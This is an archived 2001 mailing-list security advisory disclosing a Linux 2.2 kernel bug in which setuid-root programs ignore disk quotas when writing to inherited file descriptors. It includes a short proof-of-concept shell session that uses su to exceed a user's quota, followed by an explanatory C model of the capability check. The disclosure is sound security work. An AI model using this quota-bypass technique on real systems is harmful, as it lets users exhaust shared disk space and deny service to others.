7342545 2001-10-22 10:43 +0200  /53 lines/ Wojciech Purczyński <wp@supermedia.pl>
Sent by: joel@lysator.liu.se
Imported: 2001-10-22  17:02  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: linux-kernel@vger.kernel.org
Recipient: Bugtraq (import) <19533>
Subject: Overriding quota limits in Linux kernel
------------------------------------------------------------
From: Wojciech Purczyński <wp@supermedia.pl>
To: <bugtraq@securityfocus.com>, <linux-kernel@vger.kernel.org>
Message-ID: <Pine.LNX.4.33.0110220947590.29104-100000@lama.supermedia.pl>


Almost any suid binary may be used to create large files overriding
quota limits.

When a setuid-root binary inherits file descriptors from a user process,
it may write to them without respecting the quota restrictions. This is
because the suid process has the CAP_SYS_RESOURCE effective capability
enabled while writing to the file. Quota does not know anything
about who opened the file descriptor and checks the current process's
privileges only. This is a bug in the kernel and not in those setuid-root
binaries.

Tested on Linux kernel 2.2.19.

Example:

cliph$quota -u wp
Disk quotas for user wp (uid 500):
     Filesystem  blocks   quota   limit   files   quota   limit
      /dev/hda6       4      10      10       1      10      10

cliph$perl -e 'print "a"x16384' >>myfile
/vol1: write failed, user disk limit reached.

cliph$ls -l myfile
-rw-rw-r--    1 wp       wp           4096 Oct 22 10:33 myfile

cliph$su $(perl -e 'print "a"x16384') 2>>myfile
cliph$ # ^^^ this is it: su writes error message to fd 2 without limits

cliph$ls -l myfile
-rw-rw-r--    1 wp       wp          20505 Oct 22 10:34 myfile

cliph$quota -u wp
Disk quotas for user wp (uid 500):
     Filesystem  blocks   quota   limit   files   quota   limit
      /dev/hda6      28*     10      10       2      10      10

(I removed `grace' fields from quota output)

PS: Please include my address in CC as I may be not subscribed to the
list(s).

_________________________________________________________________
 Wojciech Purczyński | Security Officer | http://cliph.linux.pl/
-----------------------------------------------------------------
 Murphy's law says that there is always one more bug...
          ...but he forgot to mention whether it is exploitable.
(7342545) /Wojciech Purczyński <wp@supermedia.pl>/(rewrapped)
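The post's point is that the quota code asks only whether the task doing the write holds CAP_SYS_RESOURCE, not who opened the descriptor. The following is an added example, not code from the post or from the Linux kernel: a small C model of that decision, replaying the su scenario under the behaviour the post describes and under a hypothetical alternative policy that consults the opener's credentials instead. The struct names, the capability bit value, the block counts and the functions are all assumptions for illustration, not kernel types or functions.

```c
/* Added example (not from the original post or the Linux kernel source):
 * a model of the quota decision the post describes. It simulates the
 * behaviour in which block allocation asks only whether the *current* task
 * holds CAP_SYS_RESOURCE, and contrasts it with a hypothetical policy that
 * asks about the credentials recorded when the descriptor was opened.
 * All names, structures and numbers are assumptions for illustration.
 */
#include <stdbool.h>
#include <stdio.h>

#define CAP_SYS_RESOURCE (1u << 24)   /* bit value is illustrative only */

struct cred {
    unsigned int uid;
    unsigned int cap_effective;       /* bitmask of effective capabilities */
};

/* Per-user quota record, counted in blocks like the post's quota(1) output. */
struct dquot {
    unsigned int uid;
    unsigned int curblocks;
    unsigned int hardlimit;           /* 0 means no limit */
};

/* An open file, with the credentials of whoever opened it recorded. */
struct file {
    struct cred opener;
    struct dquot *dq;                 /* quota of the file's owner */
};

static bool has_cap(const struct cred *c, unsigned int cap)
{
    return (c->cap_effective & cap) != 0;
}

static bool over_hardlimit(const struct dquot *dq, unsigned int nblocks)
{
    return dq->hardlimit != 0 && dq->curblocks + nblocks > dq->hardlimit;
}

/* Model of the behaviour the post describes: whether the hard limit may be
 * ignored depends solely on the capabilities of the task doing the write. */
static bool alloc_blocks_current_policy(struct file *f, const struct cred *current,
                                        unsigned int nblocks)
{
    if (over_hardlimit(f->dq, nblocks) && !has_cap(current, CAP_SYS_RESOURCE))
        return false;                 /* "write failed, user disk limit reached" */
    f->dq->curblocks += nblocks;
    return true;
}

/* Hypothetical alternative policy (an assumption, not a kernel change): the
 * limit may be ignored only if the task that *opened* the descriptor held
 * CAP_SYS_RESOURCE, so a descriptor inherited from an unprivileged user keeps
 * that user's limits even when a setuid program writes through it. */
static bool alloc_blocks_opener_policy(struct file *f, const struct cred *current,
                                       unsigned int nblocks)
{
    (void)current;                    /* deliberately not consulted */
    if (over_hardlimit(f->dq, nblocks) && !has_cap(&f->opener, CAP_SYS_RESOURCE))
        return false;
    f->dq->curblocks += nblocks;
    return true;
}

/* Replay the post's session: wp (uid 500) is already at a 10-block hard
 * limit and opens myfile. If via_su is set, the descriptor is inherited by
 * setuid-root su, whose effective set includes CAP_SYS_RESOURCE, and su
 * writes its error message to it; otherwise wp writes directly.
 * Returns whether the write was allowed under the chosen policy. */
static bool replay_scenario(bool via_su, bool use_opener_policy)
{
    struct dquot wp_quota = { .uid = 500, .curblocks = 10, .hardlimit = 10 };
    struct cred wp = { .uid = 500, .cap_effective = 0 };
    struct cred su_root = { .uid = 0, .cap_effective = CAP_SYS_RESOURCE };
    struct file myfile = { .opener = wp, .dq = &wp_quota };
    const struct cred *writer = via_su ? &su_root : &wp;
    unsigned int want = 17;           /* roughly a 16 KiB message, illustrative */

    if (use_opener_policy)
        return alloc_blocks_opener_policy(&myfile, writer, want);
    return alloc_blocks_current_policy(&myfile, writer, want);
}

int main(void)
{
    printf("wp writes directly, current-task policy: %s\n",
           replay_scenario(false, false) ? "allowed" : "denied");
    printf("su writes to inherited fd, current-task policy: %s\n",
           replay_scenario(true, false) ? "allowed (limit bypassed)" : "denied");
    printf("su writes to inherited fd, opener policy: %s\n",
           replay_scenario(true, true) ? "allowed" : "denied");
    return 0;
}
```

The first two cases reproduce the session in the post: the user's own write is refused at the hard limit, while the same descriptor written by su passes because only the writer's capabilities are examined. The third case shows that a check keyed to the opener's credentials would refuse it; that policy is an assumption here, not a description of any kernel fix.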